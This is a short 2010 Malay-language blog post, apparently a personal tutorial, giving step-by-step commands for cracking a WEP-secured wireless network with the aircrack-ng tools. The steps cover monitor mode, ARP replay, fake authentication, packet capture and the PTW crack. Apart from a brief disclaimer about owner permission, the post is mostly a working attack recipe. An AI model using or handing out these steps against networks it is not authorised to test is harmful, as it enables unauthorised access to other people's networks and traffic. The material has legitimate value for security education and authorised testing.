Powered By Blogger

Saturday, March 13, 2010

Pecah Masuk WEP Key

AMARAN! TUTORIAL INI DIUJI DENGAN WIRELESS PERSENDIRIAN!

NOTE: This tutorial shows how easy it is to hack a WEP secured network it should not be replicated without the permission of the networks owner.
  • log in as root
  • Start the network device all devices are different so i cant walk you through it.
  • Put the device in monitor mode and start it with airmon-ng
  • monitor the channel and even the bssid of the target network until you find a connection to a station
  • Take note of the stations MAC address and the BSSID
  • set up the arpreplay command below but do not hit enter.

    • aireplay-ng –arpreplay -b [BSSID of the network] -h [Connected clients MAC address] [Interface]
  • Next we preform a fake authentication with the network to speed up the ARP replies.

    • aireplay-ng -1 0 -a [BSSID of the network] -h [Connected clients MAC address] -e [ESSID or Network Name] [Interface]
  • Hit enter on the fake authentication window then right away switch to the arpreplay window and press enter as well. If need be use Ctrl + C to repeat this process many times. It can take up to 15 mins for the ARP replies to come in. After which point you should try to authenticate again.
  • Once the ARP replies start to come in open a new tab and log them with airodump-ng

    • airodump-ng -c [Channel] –bssid [BSSID of the network] -w [Capture file name] rausb0
  • Wait for the Data to reach 80,000-100,000 then begin the actual cracking process.

    • aircrack-ng -z {This starts the PTW attack which is much faster} [Capture file name]

No comments:

Post a Comment